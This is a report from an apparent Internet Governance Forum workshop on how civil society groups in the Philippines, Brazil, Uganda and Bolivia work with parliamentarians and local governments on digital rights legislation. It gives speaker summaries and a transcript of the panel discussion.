In conclusion, this analysis provides valuable insights into various aspects of policy intervention and engagement. It underscores the importance of comprehensive involvement, the role of civil society, the proactive approach of organizations like Internet Lab, the significance of alliances in parliament, and the necessity of serving the public interest. It acknowledges concerns regarding imperfect accountability but emphasizes the need for effective mechanisms to ensure policymakers act in the best interest of the public. These findings offer valuable perspectives for policymakers and stakeholders striving for inclusive and effective policy-making.

Audience

The analysis explores various topics concerning governance and SDG 16: Peace, Justice, and Strong Institutions. One key point raised is the difficulty in translating discussions between the national and local levels. This poses a challenge as issues can be lost or significantly altered during the translation process. It emphasizes the importance of improved coordination between local and national governance to facilitate effective communication and policy implementation. The analysis advocates for advocacy efforts to enhance coordination between these governance levels.

Another important topic discussed is Paradigm Initiative’s unsuccessful attempt to enact digital rights enabling legislation in Nigeria. Despite receiving support from certain parliamentarians, the bill did not receive the necessary assent from the President. This setback underscores the need for effective lobbying strategies and consensus-building among political parties. The analysis highlights that political parties may have differing views on digital rights, making it difficult to gain consensus and legislative support. Engaging with Members of Parliament on this issue can also be challenging due to party influences. Developing strategies that navigate these complexities is crucial to promote the enactment of digital rights enabling legislation.

Additionally, the analysis mentions the efforts in Uganda to establish a parliamentary forum on internet governance. This initiative aims to raise awareness and educate Members of Parliament on internet governance issues. The Uganda Media Sector Working Group is actively involved in creating awareness of relevant laws. Plans are underway to establish the parliamentary forum as a platform for important discussions and knowledge sharing among parliamentarians. This proactive approach demonstrates a commitment to addressing internet governance issues and promoting a deeper understanding among policymakers.

Overall, the analysis sheds light on the challenges and opportunities in governance, particularly within the context of SDG 16. It emphasizes the need for improved coordination between local and national governance, effective lobbying strategies for digital rights legislation, and initiatives that educate and raise awareness among policymakers. These insights contribute to the broader discussion on achieving peace, justice, and strong institutions as outlined in SDG 16.

Sarah Opendi

Upon analysis of the provided data, several main points emerge regarding the role and responsibilities of parliamentarians in relation to the digital space, technology, and internet governance.

Firstly, it is argued that civil society should equip members of parliament with necessary information and skills in the digital space and technology. This would enable parliamentarians to better represent the public’s interests in this increasingly important area. Furthermore, the central role of parliamentarians in connecting the public and the executive, thereby representing the public’s interests, is highlighted as essential.

Another key point is the need to create awareness among parliament members about technical matters related to the internet and internet governance. The evidence suggests that currently, only a few parliament members possess an appropriate understanding of these issues. It is proposed that by increasing awareness and knowledge in this area, parliamentarians can effectively address digital literacy issues, advocate for affordable internet access, and ensure the incorporation of ICT in the education curriculum.

Additionally, the analysis reveals that in Uganda, parliamentarians should serve as links to lower local governments on internet governance matters. It is noted that there is currently a missing ICT committee at the local government level to oversee internet issues. The implementation of a top-down approach, engaging policymakers, is advocated by Sarah Opendi, reflecting her belief in the importance of connecting parliamentarians with grassroots communities.

Furthermore, it is brought to attention that artificial intelligence (AI) remains largely misunderstood by parliament members. Increased awareness and equipping parliamentarians with key information on AI is advocated as a means to address this knowledge gap.

In terms of advocacy and collaboration, Sarah Opendi supports the idea of a parliamentary forum on internet governance, which would serve to handle advocacy issues and foster collaboration with civil society organisations. This forum aims to strengthen the involvement of parliamentarians in internet governance matters and enhance partnerships for the goals of peace, justice, and strong institutions.

Noteworthy observations include the suggestion that identifying champions for bills is crucial to ensure their successful passage into law. In Uganda, a bill can become law even without the president’s assent, provided that parliament insists on passing it after the president returns the bill. It is also highlighted that engaging local populations through effective means, such as radio talks and community meetings organised through local governments, is key to advocating for bills.

In conclusion, the analysis sheds light on the importance of civil society’s role in equipping parliamentarians with digital knowledge, as well as parliamentarians’ central role in representing the public’s interests and connecting with the executive. It underscores the need for increased awareness and technical knowledge on internet governance among parliament members. Furthermore, it highlights the necessity of advocating for affordable internet access, addressing digital literacy, and incorporating ICT in the education curriculum. The creation of a parliamentary network on internet governance, the identification of champions for bills, and engagement with local populations are proposed as effective strategies to enhance the role of parliamentarians in policy-making and governance processes.

Liza Garcia

Liza Garcia is a prominent human rights advocate who leads an organization dedicated to monitoring and documenting cases of rights violations, with a particular focus on online gender-based violence. Since 2012, Garcia and her team have been diligently collecting evidence of instances of this form of violence. They also actively monitor developments in areas such as SIM card registration and the national ID system.

Garcia strongly believes in actively participating in the process of drafting and implementing laws. She emphasizes the need to ensure the proper implementation of laws and regulations by advocating for her organization’s voice to be heard in policy consultations. By engaging policymakers and parliamentarians, Garcia provides them with evidence of rights violations to support her cause.

An important aspect of Garcia’s work is educating citizens about their rights and the potential impact of new laws. To achieve this, she conducts workshops in communities to increase awareness and empower individuals to protect their rights. By fostering a deeper understanding of the law and its implications, Garcia aims to empower individuals to take action and advocate for their rights.

In the realm of policymaking, Garcia focuses specifically on gender and ICT, as well as privacy and data protection. She aims to address gender disparities in the digital space and advocate for the privacy and data protection rights of individuals. By collaborating with partner organizations and consulting with relevant stakeholders, Garcia works towards building an agenda that reflects the needs and concerns of these communities.

One notable aspect of Garcia’s work is her opposition to the SIM Card Registration Act. She actively campaigned against this legislation, creating a briefing paper that was distributed to legislators and other concerned groups. Thanks to her efforts, the law was successfully vetoed during the previous administration. However, Garcia expresses disappointment that the law eventually passed under a subsequent administration, highlighting the challenges faced in maintaining progress.

Garcia also recognizes the importance of community engagement and collaboration with local governments. She emphasizes that local governments have the ability to pass policies that might be challenging to implement at the national level. By fostering these partnerships, she believes that effective change can be achieved more readily.

Effectively disseminating information is another key area of focus for Garcia. She acknowledges the pivotal role that social media plays in providing information about digital rights issues. Garcia emphasizes the need for individuals to be engaged on whichever platforms they use to stay informed and take action. Additionally, she notes that visual and easily understandable content can be more effective in conveying information, especially as people may be less inclined to read lengthy research papers. By utilizing visual communication, Garcia aims to engage a wider audience and prompt action.

Lastly, Garcia acknowledges the importance of media engagement in raising awareness and expanding the reach of the issues she advocates for. By engaging with the media, she can increase public visibility and generate support for her cause.

In conclusion, Liza Garcia is a dedicated advocate for human rights and an influential figure in the fight against rights violations, particularly online gender-based violence. Through her organization’s efforts to monitor and document cases, Garcia collects evidence to support her cause. She actively engages in the policy-making process, educates citizens about their rights, and focuses on gender and ICT, privacy, and data protection in policymaking. Despite facing challenges in maintaining progress and opposing unfavorable legislation, Garcia remains committed to community engagement, effective information dissemination, and media engagement to further her cause.

Session transcript

Liza Garcia:
chance to intervene, and that is with the drafting of the implementing rules and regulations. Once it’s already a law and implemented, then there is the monitoring of the law for its proper implementation. Of course, aside from the laws being passed, there are also policies emanating from other government agencies. For example, in the case of the Philippines, they were coming up with the national cybersecurity plan, so government would always have this consultation with different stakeholders. And since the issue is also something that we look into, we make sure that we are invited and that our voice is heard, especially in looking at certain provisions in these plans. What else? As a civil society organization, we’ve been monitoring and documenting cases of rights violations. For instance, since 2012 we’ve been documenting cases of online gender-based violence in the country. Currently we are also monitoring developments in the SIM card registration, which you mentioned, which was just passed. There’s also the national ID system. We’re looking at how our rights are affected by the passage of these laws. And since we’ve been monitoring them, we have cases, and so we have evidence when we have dialogues and engagements with parliamentarians or policymakers; we have some evidence in our hands that, hey, this is happening, can we do something about this? So those are some of the things that we do. But it’s not just legislators and policymakers that we engage with. We also make sure that citizens know their rights, that they are aware of even the digital laws that are being passed and how these would impact them. So from time to time we go to communities and have dialogues with them, conduct workshops, so they know what the laws are and how these are affecting them as well.

Nick Benequista:
That’s terrific. I mean, it sounds like you’re really taking advantage of every entry point that exists within the rules and regulations for participation in the policy process, as well as gathering the evidence and holding the discussions to keep an eye on how those policies are being implemented and what their consequences are. That sounds like a really holistic approach. You hadn’t mentioned the agenda-setting aspect of policymaking, so just one quick follow-up: in terms of who decides which pieces of legislation, which issues, get legislated and regulated, do you have any experience with getting civil society to build the legislative agenda itself?

Liza Garcia:
In our case, our focus is really more on gender and ICT, and then privacy and data protection, so we mostly intervene in cases like that. We also consult with our other partners. They may not be focused on digital rights per se, but they are working on specific issues that may be impacted by a law, so we work with them as well; we consult with them and we come up with an agenda. For instance, when we were looking at the SIM card registration act, it’s been there since, I don’t know, 2014, I think, and we were looking at it already by 2018. I think we came up with a briefing paper, with my colleagues from the privacy program, and it was published and distributed even to legislators and to some other groups. And yet every Congress, there’s always someone who proposes that bill; it’s always there. And I remember in the previous administration, it was about to be passed; both houses of Congress had already approved the bill, so it was just waiting for the signature of the president. But what we did in civil society is we had a discussion among ourselves: are we okay with this bill? What do we do? So we came up with a statement. I think there were three of us; one group was doing an online campaign. We came up with a statement and asked other partner organizations whether they agreed with the bill and, if not, to sign on to the statement. And at the last minute, we even submitted a letter to the president to veto the SIM card registration act. Fortunately, during that time, it was vetoed by the president. We were even surprised by that small win. However, of course, things changed during the next administration: it was the first piece of legislation passed into law by the current administration.

Nick Benequista:
Thanks very much, Liza. That’s great. You know, I’m sure you don’t win every battle, but you gain strength every time you engage in some parliamentary debate; I’m sure the networks grow stronger and stronger. That sounds like a terrific approach you are taking. Fernanda, from Internet Lab: Brazil is known for its experiments in participatory governance and participatory budgeting. In the context of internet governance and platform regulation, I’m curious to know if you’re seeing the same level of innovation in terms of participatory, multi-stakeholder policymaking. How are parliamentarians in your country engaging in these issues? And are diverse perspectives in particular finding their way into the debates?

Fernanda Kalianny Martins Sousa:
Good morning, everyone. Thank you, Nick, for the invitation and for the question. It’s really a pleasure to be here discussing this theme with you. Related to Brazil, to be honest, although Brazil is known for social participation in discussions related to internet governance, when this new Lula government started, it was a little frustrating for civil society organizations. In comparison with the Marco Civil da Internet in 2014, when we really had participation of academia, civil society organizations, and legislative and executive members, the context now is so different, because we had a far-right government in the last four years. And when Lula assumed the new presidency, we had the pressure of society, the pressure of the federal state, the pressure of the Chamber of Deputies. And in this context, with this sense of emergency, it’s not the same process. So we have Bill 2630, discussed over the last three years, and now, with the new federal government, we are trying to approve this law. This law is the fruit of civil society organizations’ work over the last three years combating the Bolsonaro government. So it is a good law, with some problems, but we are not sure that this law will be approved. So it is interesting to think about how, in Brazil, the discussion related to platform regulation can be set aside. The importance of this discussion has now become a kind of bargaining chip with the Congress. So when far-right congressmen decide to put to a vote a bill related to abortion, for example, or a bill that would attack indigenous people, the president of the Chamber of Deputies says: no, if you put this to a vote, we will vote on 2630. It is such a complex moment, because at the beginning of the year we had the attempted occupation in Brazil, and after that some attacks against public schools, and all this discussion has been set aside, no longer driven by digital rights experts as in the case of the Marco Civil da Internet.
So, in this context, I think it’s important to say that we don’t have a government consulting civil society as occurred in the past, and I think it is important to pressure the government about that. And when this process passed to a left government, we had people from civil society organizations going into the government, and it’s complex, because we know these people, we know that they have good intentions, and at the same time we know the complexity of the political conjuncture. So it is a really difficult moment, but a moment in which we can hope. It is hard, but not as hard as in the last four years. Great, thanks. Thanks a lot.

Nick Benequista:
That’s, yeah, that’s a lot of work, it sounds like. I mean, just one quick follow-on question. The three years that you put into bringing civil society together: can you say a few words about the scope and scale of that effort? Do you have to travel around the country? Is it a matter of, you know, meetings in the capital or a few other cities? How do you do the work of getting these diverse views together on this issue, on the 2630 bill?

Fernanda Kalianny Martins Sousa:
Sure. So at Internet Lab, we have been working on things related to internet governance for the last nine years. When this discussion started, we were working together with a coalition that has more than 50 organizations across the whole of Brazil. There we have this movement to try to understand and follow all the movements in the different parts of the Congress, and the step-by-step discussion of these bills. In the case of platform regulation, I think it’s important to highlight the role of the federal deputy Orlando Silva. He’s a congressman in a left party, and his role in this discussion was so important: to have a parliamentarian that involved in the discussion. And it’s not common, you know. We now have the discussion related to artificial intelligence regulation in Brazil, and we realized that it’s not easy for parliamentarians to understand what is happening, what the impact of these kinds of regulation is. And because of that, I think one main problem in this discussion is: okay, the government is part of the urgency, but we can’t think just about the urgency. We need to think about the future and the flexibility that this kind of law needs to have. So I think the point is, ten years after the Marco Civil’s approval, we know that self-regulation has not been working. And I don’t know, in five years we might be saying that state regulation was not sufficient. So the challenge for me is how we can learn from what happened in the last ten years and not repeat the wrongs that we committed in this process.

Nick Benequista:
That’s terrific, Fernanda. And I mean, it highlights an important point: I think engagement for most civil society organizations with parliaments and policy processes tends to start out being quite reactionary. And it sounds like over the last decade, you are beginning to develop the networks and the capacities to think proactively about that agenda, which is fortunate. I mean, I think that’s probably a privileged position relative to others. You also mentioned an important point, which is a great segue to this introduction: the importance of having an ally in parliament at the beginning of the discussions around the misinformation law. And we are in fact joined, fortunately, by the Honorable Sarah Opendi, to my left here, who is an executive committee member of the African Parliamentary Network on Internet Governance, APNIG. She sits on the executive committee of a network that is precisely trying to build a network of parliamentarians who can champion these discussions and the development of policy across the African continent. She is a Ugandan state minister for mineral development and a chairperson at the Uganda Women Parliamentary Association. And prior to all this, the Honorable Opendi was the state minister for health, for which she received a global leadership award. So I’m so glad you could join us, because allies in parliaments willing to work with civil society are too rare indeed. So a question for you, Honorable Opendi. We have seen national policymakers exerting growing influence over the internet and digital governance. Policymakers, of course, do represent the public and are held accountable through electoral means, but those forms of accountability are still imperfect in all countries around the world.
And it’s especially imperfect on an issue such as this, which doesn’t have a ton of public engagement. And so there is a risk, I think, that policymakers may not be serving the public interest in terms of their engagement on these issues. They might be serving other, narrower interests, including personal interests. So what are your advice and thoughts on how to ensure that policymakers in this area are serving the public interest through their work?

Sarah Opendi:
Yeah, thank you very much, and thank you for that introduction. I bring you all greetings from Uganda, the Pearl of Africa, and thank you for inviting me to this panel. I came in when my colleague was speaking about civil society and how important it is for them to engage with members of parliament. We must agree that as parliament we play a central role: we are between the public and the executive. And our role as members of parliament is certainly to make laws, the legislative function, but also the function of representation, and as much as possible we must be able to speak for and represent the views of the public. But the subject that we are discussing, this digital space, technology, is something that we all know is important. However, not much emphasis has been placed even on creating awareness among members of parliament on technical matters. So it’s very important, since we have the civil society, the NGOs, to first and foremost, as much as possible, arm the members of parliament with the relevant information and the relevant skills, so that they can then represent public interests better. You have said we are serving personal interests or narrow interests. Yes, true, because even amongst us as members of parliament there is a bit of a lack of information. Other than us talking about misinformation and disinformation, when it comes to the technical details about the internet and internet governance as a whole, we have very few people who can speak up on that matter. So this is why we came up with the African Parliamentary Network on Internet Governance, so that we can bring together like-minded people to champion the issues of internet governance at the country level.
Actually, as we speak now, in my country, although we have the ICT, the Information and Communications Technology Committee, within parliament, their role is mainly oversight over government programs and government policies, but that’s not all. We need to engage in advocacy. We need to see the challenges that the population is facing. We need to ensure that internet is affordable. As we speak now in my country, only about 29% of the people have access to the internet. So we need to ensure that when we are appropriating funds, we appropriate adequate funds so that the entire country can be covered. We have areas where we don’t have electricity as we speak now, and we have areas where the telecom companies have not been able to invest. So not the entire country is covered; there are areas you go to and you’re off the internet. So these are some of the things that legislators must do: appropriate funds, and first of all recognize the importance of this digital economy and know that it has multiple economic benefits for the entire population if they are all connected. We must also ensure that, as part of the education curriculum, this whole technology, ICT, is taught to the children, because that is another challenge. We have a population that is a bit illiterate; we have people with smartphones who can’t use them. So there is a lot of work that still needs to be done in terms of digital literacy. And of course, engagement of the civil society and engagement of the government are all important. Other than just legislation, there’s a lot that we have to do as members of parliament. Thank you very much.

Nick Benequista:
Thank you. Thank you very much. I’m so glad you’ve been able to join us. And I have some follow-on questions. I’m going to come back to you for sure. I just want to turn to Camilo for a moment. Camilo joins us from Bolivia, from Internet Bolivia. As I said, he’s an Open Internet for Democracy fellow. And I think Camilo has a really interesting perspective to add. We’ve been talking primarily about legislation and policy at the national level, but Camilo has taken a different approach. He’s been working at the municipal level. And you don’t often think of internet governance and digital governance at the municipal level, but you have a strong view on this. So can you explain why the municipality is a good place to engage in Bolivia? And I think it’s on data privacy in particular, the issue that you’re working on. So if you could say a few words about your approach. Thanks.

Internet Bolivia Foundation:
Hi, thank you. Thank you, Nick, and thank you everyone for coming. Yes, I've been working with the Internet Bolivia Foundation, and I think Internet Bolivia is working really well at the municipal and local levels. Because, as you know, there is actually no regulation for the protection and processing of personal data in Bolivia. But that doesn't mean we have to be unprotected; we can still have policies about this at the local level, right? And we have some really good news. For instance, Coroico, a small municipality in Bolivia, recently adopted a policy on digitalization and data management, for example. That makes me think about how much you can really do at the local level, right? And so I decided to focus there, and I think I have some good reasons. Working at the municipal level, at local levels, gives you a very direct and deep understanding of the local needs in the communities, because local governments are really close to the people and can work with them. In these terms, after the pandemic and everything we went through in the last years, I think digital access, data protection, internet usage, digital violence, and the gender approach have become very important things, right? And at the local level, you can also work on them. Another thing is that local regulations can sometimes be faster and more effective. From a national perspective, for example, there is a lot more bureaucracy; there are many steps you have to go through. But at the local level you can take a faster, more effective, less bureaucratic approach. In that sense, local policy can sometimes even be better than national policy, right? And I think it can be really easy for a local government to ensure really good policies in that sense. I also have another reason, which is about innovation and digital topics.
On this topic, at least, I think the local level can serve as a pilot. Because, for example, as I mentioned, Coroico recently adopted this digitalization and data management regulation, and after it happened, many other municipalities wanted the same. They contacted Internet Bolivia, and they wanted to know what it is about and whether it is possible to have it at the local level, without waiting for the national level. So I think that's a really nice entry point, because now they are interested, and they realize they can actually make digital rights policy from a local perspective. And it's possible, right? I was also thinking about how these local digital rights regulations can actually empower some local leaders. Local leaders are usually young; national policymakers are usually not as young as local policymakers. So if these local policymakers are young and engaged in these digital topics, they become very empowered on them. I think that's very interesting. Taking the example of Coroico again, the mayor is a woman of about 30 years old, so she's really young, and she's really into these digital topics. It was a really nice way of empowering her to know about this topic and talk about it, and now there is a really nice policy. And I think the most important thing may be community involvement. I used to criticize some local governments a lot, because sometimes the local representatives in the national policymaking assemblies don't live in their communities anymore. They decide to move to the big cities and make local policies for their communities, but from the big cities, and they don't live in their local towns anymore.
For example, someone may be a policymaker representing a small town, but they decide to move to the big city of La Paz and are no longer engaged in their local municipality. I think that doesn't work; that's why they don't really make good policies in those terms. But when you work in a municipality from a local perspective, living there, being with the people every day, you can see what can be done. In those terms, I think it's very interesting to work from a municipal entry point.

Nick Benequista:
That's great, Camilo. And I'm going to go back to the Honorable Ms. Opendi in a moment to react to some of what you've said, but a quick follow-on question for you. It seems to me that you've probably learned a lot about what makes people care about digital policy issues. With so many pressing issues in a local community, what convinces people that data privacy, of all things, is something important?

Internet Bolivia Foundation:
Yeah, when we were working with Internet Bolivia in these local communities, we usually liked to do workshops and so on, and I think that is very important, because if the people from the communities know what we are going to do, that is a really nice entry point toward these kinds of policies on digital governance. Sometimes people from small communities think this is a really huge and big issue. But when you teach them, when they are engaged and we do workshops and try to show them how things can improve, they get more engaged. For example, I used to travel around inside Bolivia, since I work for Internet Bolivia, and in Villa Montes there is a really nice community you can work with.
On these topics, as soon as we arrived in Villa Montes, they knew we were the Internet Bolivia Foundation, and they just approached us: we want some workshops, we want to know something about digital rights. They are really into this. So it's really nice, actually, because we are not imposing; they are asking us to engage on these topics. And after working with the communities, the policymakers and the government come and say, oh, what should we do? Because people are interested. I think that is really interesting. It's also very important that at Internet Bolivia we have a nice partner organization that works in Coroico and in Villa Montes, for example, all the time; they are present there. I think it's very important not to be an NGO that just comes for two or three focus groups, so that the policymakers and the people from the community see just some guy or some organization that comes for a week, or two or three days, to do some observation work and then says, now we know what you need. I think that's not a good entry point. But if you work there continuously every week, or basically live in the community, or work with them on other topics too, people usually engage with the topics you bring. That happened in Coroico, I think, because in Coroico I realized people are really eager for these topics, digital violence for example, because we were constantly traveling there, and we also helped them with other kinds of topics, like youth empowerment. And it's really interesting: now in Villa Montes and in Coroico, these small communities are also working on regulations for youth, for example, and they are putting a digital perspective into these youth policies, because they are young and we are living in a digital era.
So now the digital perspective is going to be in this regulation. It doesn't always have to be a digital regulation as such; it can be a youth empowerment regulation, but with a digital perspective.

Nick Benequista:
Great, thanks a lot, Camilo. As I said, one last question for you, Honorable Opendi, and then I'm going to open up the floor for your questions. Those of you who are sitting behind, please come join the table. It's a workshop, so we'd at least like to be able to see you in case you have a question, and there are plenty of chairs over here. We've heard from the other panelists different approaches to engaging with policymakers: in the Philippines, taking advantage of the formal structures of participation that the Assembly there offers; the municipal-level engagement that Camilo was describing; and in the case of Brazil, building a strong network of civil society organizations, in conjunction with allies in the Parliament and in the government, over the course of many years, to proactively put forward ideas for policy. I think a lot of the folks here are probably asking themselves: what is the best strategy? I know it's contextual and it will vary, but what advice do you have for folks on how to think about starting to engage with policymakers? Bottom up? Start here in this space and bring more parliamentarians? Build the networks? There are many options, but what do you think works?

Sarah Opendi:
In my view, the way we are structured in my country, in Uganda, is that we have a national parliament whose members are elected from the grassroots, but we also have elected leaders in local government at the district level and the sub-county level. We are also aware that connectivity is still low and access to the internet is limited; as I said, only 29% of the population currently has full access to the internet. The best way is to engage members of parliament: it should be a top-to-bottom approach. I say that because while at the national level we have the ICT committee that does oversight over internet issues, when you get down to the local government level, that kind of committee is missing. It is therefore the members of Parliament who should be the link to the lower local governments, and that's why I'm opting for the top-to-bottom approach. But as I did indicate, awareness creation among members of Parliament is key, and arming members of Parliament with the key information is also very important. We are now talking here about issues of artificial intelligence, and other than a few members of Parliament who have read about it, I'm not sure that even one third of us know the details of the challenges and benefits of artificial intelligence. So it's important for the civil society organizations, which are also grassroots-based and pick up views from the grassroots, to bring this information, and all the other technical information they have, to the members of Parliament, and then we can champion it. The other thing is to organize at the parliamentary level: as we speak, I am trying to create a parliamentary forum on internet governance, so that we can have this work away from the ICT committee. We need members of Parliament who can be champions on issues of internet governance. So this, to me, is the way to go, because then,
when you have this forum, which is not the official parliamentary forum, we can handle issues of advocacy and deal freely with the civil society organizations. So that, to me, is the way to go. Thank you very much.

Nick Benequista:
That's great. That forum, a little bit separated from the official policy-making bodies, gives more freedom to engage.

Sarah Opendi:
It's away from the usual committees, because their work is structured in a certain way.

Nick Benequista:
That's a terrific piece of advice. Great, I'd like to open up the floor to your questions, and also your experiences, if you have some lessons learned. Down at the end there. Is there a, oh, Herman, is there a microphone in front of you there? I think for the camera they'd probably prefer that you grab a microphone and sit at the table.

Audience:
Well, thank you. Thank you very much. This is Herman Lopez from the board of the Judges Standing Group of the Internet Society. Thank you very much for your explanations. It's really good to see different perspectives from the global South on how to coordinate between the local level and the national level. But I wanted to ask the panelists: what practical advice should we take into account when we do that coordination? I work on many advocacy issues with the Colombian Congress, but it's usually very difficult to translate the discussions happening in the capital city, in Bogotá, to other places. So I would like to know from your own experience how you are able to do that better, because sometimes issues get lost in translation when they come from the local level to the national level, and they end up changing a lot; but the same also happens the other way around, when the national government tries to do things at the local level. So what can we do to preserve the message and the idea that was originally intended? Thank you very much.

Nick Benequista:
Great, I’ll take another couple of questions. Yeah, go ahead, Tobe-Kile, and then Claire.

Audience:
Thank you so much for the reflections. I will come in and share an experience from our end. My name is Tobe-Kile Matimbe and I work for Paradigm Initiative; we work across Africa promoting digital rights and digital inclusion. A few years back, what we did at Paradigm Initiative was to come up with a draft digital rights bill, which we introduced in the Nigerian parliament, and we were able to collaborate with some parliamentarians who helped us push that digital rights bill forward. But unfortunately, after it had sailed through Parliament, it was not assented to by the President. So I'm curious about how we can collaborate on effective, I don't want to use the word lobbying, but effective pushing for laws to be enacted, and how that process works. I will direct this question to the Honourable Member of Parliament from Uganda: what would the recommendation be with regards to how we can effectively see the enactment of digital rights enabling legislation, in view of that? We have also noted a challenge in other jurisdictions where we work: we might engage with members of Parliament, but when a political party has a certain view on something, no matter how much you engage with a member of Parliament, the outcome of that engagement and collaboration might be futile, because even if in principle you agree on what needs to happen with regards to policy, the pushback comes from the political parties that members of Parliament come from. So what would be the way forward in that respect?

Nick Benequista:
Great, thanks. Claire, go ahead and introduce yourself first.

Audience:
Thank you. My name is Claire Mohindo from Uganda, and it's good to hear from the Honourable Minister from the motherland.
Supplementary to what she mentioned about parliamentary forums: I'm really glad she mentioned that they are planning to set up a parliamentary forum, because from experience with advocacy on different issues, parliamentary forums have been very key in educating members of Parliament on key issues, but also in helping build a network of champions on key issues. So it's good to hear that they're planning to come up with a parliamentary forum on internet governance. I'm curious to know how far that has gone: what stage have you reached in setting up that forum? Also, to pick up lessons from my engagement with the Uganda Media Sector Working Group, which is a coalition of stakeholders from the media industry, academia, government, the Media Council, and the Ministry of ICT: what we've been doing is organizing sessions where we educate people on different laws that have been passed, even those we don't agree with, to create awareness, create messages, and break things down to help people understand them. So it would be nice to know how far the process of setting up the parliamentary forum has gone, so that we can see how to collaborate and work with the members of parliament. Thanks.

Nick Benequista:
I'm going to go back to the panelists now, because otherwise we're going to run out of time. So there's Herman's question about the mismatch between the local and the national level. From Nigeria: how do you do effective lobbying, when it's a bit of a swing and a miss there, and what happens when it gets politicized, when you end up with really strong political opposition to your proposal? And Claire's question: how is this parliamentary committee, sorry, this parliamentary forum, I should say, developing? Do you want to start with the responses there? And then you guys as well.

Sarah Opendi:
Thank you. Thank you very much. Maybe I'll begin with the parliamentary forum. We've written to the Speaker and we're still waiting for a response, because the Speaker must certainly agree to being a patron or not. That's where we are. Otherwise, we have membership drawn from different political parties, so we'll certainly let you know once we are done with that. This has all arisen because of the various engagements and meetings that I have attended; while I am busy out here, within parliament in the country there is not much work being done, so it is something I have championed myself, aware that it's quite important to have that advocacy. Moving to my sister's question about the politics around some of the bills that come to parliament in relation to the internet or digital issues: I want to tell you that once you have champions, irrespective of which political party they belong to, they will stick to what they believe is right and what should be done. That's why it's important, during the whole process when you have a bill before parliament, to identify champions. If a bill has moved through the processes and the president has not assented, when you have people in parliament convinced that the bill is important, they will still stick to it. In my country, we've had bills that have gone to the president and the president has not assented to them and returned them. The law says that when the president returns a bill and parliament sends it back, and the president returns it again and parliament sends it back a second time, it becomes law, for as long as we do not change our position. So the most important thing is first to convince members of parliament that the provisions in the bill are correct, but also the population, because it's the population that puts pressure on members of parliament.
So when they hear all these voices from the population urging their members of parliament to stick to certain provisions, to stick to this law that they want, the members of parliament will definitely act. So do not just engage the members of parliament; as civil society, also engage the population, so that the voices come from below and put pressure on members of parliament. Then, irrespective of the president's position, irrespective of the political party's position, the members will stick to the bill that they believe is the correct one and has majority support from the population. That is my advice: do not lose hope. If the bill was returned, engage members of parliament, and go and engage the population so that they put pressure on their members of parliament. I think the other question, from the gentleman, was how we can move from the national to the local level. One way is that once you have members of parliament armed with the necessary information, like the forum I'm talking about, you can engage the population through radio. We have radio talk shows; for example, as the Uganda Women's Parliamentary Association, there are certain bills we are working on, like the marriage bill in my country, which is over 100 years old, from 1905. What we do is go out; you may not reach every community, but when you get to the different radio stations in different regions, you reach a wider audience and sensitize them so they can understand, and they can also call in and you get their views. The other way is to engage our local governments, which in my country exist at the district level and the sub-county level. You can engage those local government leaders and equip them with the relevant information, so that they can also reach down and speak to the population. So those are some of the things that can be done. Thank you very much.

Nick Benequista:
So we're running short on time. I just want to give each of you a couple of minutes to respond to the three questions. Liza, do you want to start? Unfortunately, I think time won't allow for another question, but stick around; I'm sure there'll be an opportunity for us to chat informally too. Yeah, okay.

Liza Garcia:
On that disconnect between the community and the national level: as I mentioned earlier, it's not just engagement with legislators that we do. Engagement with the community is also important, and that's one of the things that we do; we hold discussions with groups within the community. I also agree with the Honorable Opendi that engagement with the local government works, because in our case, for instance, certain laws are difficult to pass; it can take years, even decades, for some laws to be passed. But if you engage with the local government, they can pass policies. For instance, some cities have passed anti-discrimination policies, and those did not have to go through national legislation. There's also the role of social media. Of course, we need to engage individuals wherever they are, on whichever platform, so it's important to engage them there and provide them with information about digital rights issues. We also do partnerships with different groups. For instance, we are doing a campaign on disinformation, to help people understand what it is all about, so we partnered with comic artists. They came up with a series of comics explaining what disinformation is all about, why it's bad for you, et cetera, and we didn't just publish it on social media; we also hold exhibits in different areas for people to understand the issue. Because sometimes it's difficult if you just give people the long research papers that you have; people won't read that. But something visual, and short, is something they will read. And also engagement with the media: if you want to raise the profile of your issue, go to the media, which also gives you a wider reach to the public.

Nick Benequista:
Great. Camilo?

Internet Bolivia Foundation:
Okay, I know we don't have so much time, so I would just like to say that I truly believe in working at the community level. And I would like to highlight what the Honorable Minister said: I think we should have key champions on some issues, but we should also have municipal or local community champions on some special topics. That can be a really nice way to work, and to show other local communities how some good regulations can be done.

Nick Benequista:
Final word to Fernanda.

Fernanda Kalianny Martins Sousa:
Oh, gosh. Really good questions. I think one of the challenges that we have is to connect the international, national, and local levels. At InternetLab, in the last year, because of the elections, we had the opportunity to take part in an articulation room against disinformation. I think it was really important, because in this articulation we had not only digital rights organizations but also different NGOs related to human rights in general in the country. And considering the size of Brazil, we know that it's not enough for people in São Paulo or Rio de Janeiro to be talking about digital rights in the process of approving laws and regulating platforms. When we work together with CSOs from different fields in the country, and from different fields in the global South, I think we have the opportunity to push for laws, and not only that, but also to pressure the big tech companies, the different companies that are affecting our way of life. One example, to finish: we have a law in Brazil against political gender-based violence, and we are using all the structures that the state gives us. For example, after each election we have an electoral mini-reform, and we are trying to get some points related to this law approved in the mini-reform, points connected also to online hate speech against women. So we are trying all the time to occupy the structures that exist and to create new structures. And I think that's not possible if we don't work together with different stakeholders. So thank you, Nick. Thank you, guys.

Nick Benequista:
Look, thanks very much to our panelists today. I have to say, this is my first IGF and I'm a little biased, but I feel like this panel has given me a little bit of hope. There's a lot of really amazing work here; it's substantive, it's very specific, and there are real results. For my colleagues at CIPE, CIMA, and NDI: obviously you can be in touch directly with the panelists up here, but is there some way to stay in touch with this conversation about parliamentary engagement? What should people be looking out for? Any final recommendations from our colleagues on how to stay in touch?

Audience:
Hello? This is Daniel O'Malley from the Center for International Media Assistance. I think this was a really great panel; I learned a lot listening. If people are interested in this type of engagement with parliamentarians and policymakers at the national, international, and local levels, just reach out to me or come talk to Anna, because this is a topic we're quite interested in. We think it is an opportunity to promote digital rights in this broader context where we know that internet freedom is slipping, so we need to work on all the levers of government and, as Fernanda was saying, use the mechanisms we have and create new mechanisms. So I would say just reach out to us and stay in touch. And thank you, everyone, for showing up at 8.30 in the morning.

Nick Benequista:
Indeed. And to those online, thanks for joining as well; we had a pretty good number of participants. So, a round of applause for our panelists and for yourselves. Thanks very much, everybody.

Speaker                          | Speech speed         | Speech length | Speech time
Internet Bolivia Foundation      | 190 words per minute | 1642 words    | 519 secs
Audience                         | 164 words per minute | 826 words     | 303 secs
Fernanda Kalianny Martins Sousa  | 126 words per minute | 1183 words    | 565 secs
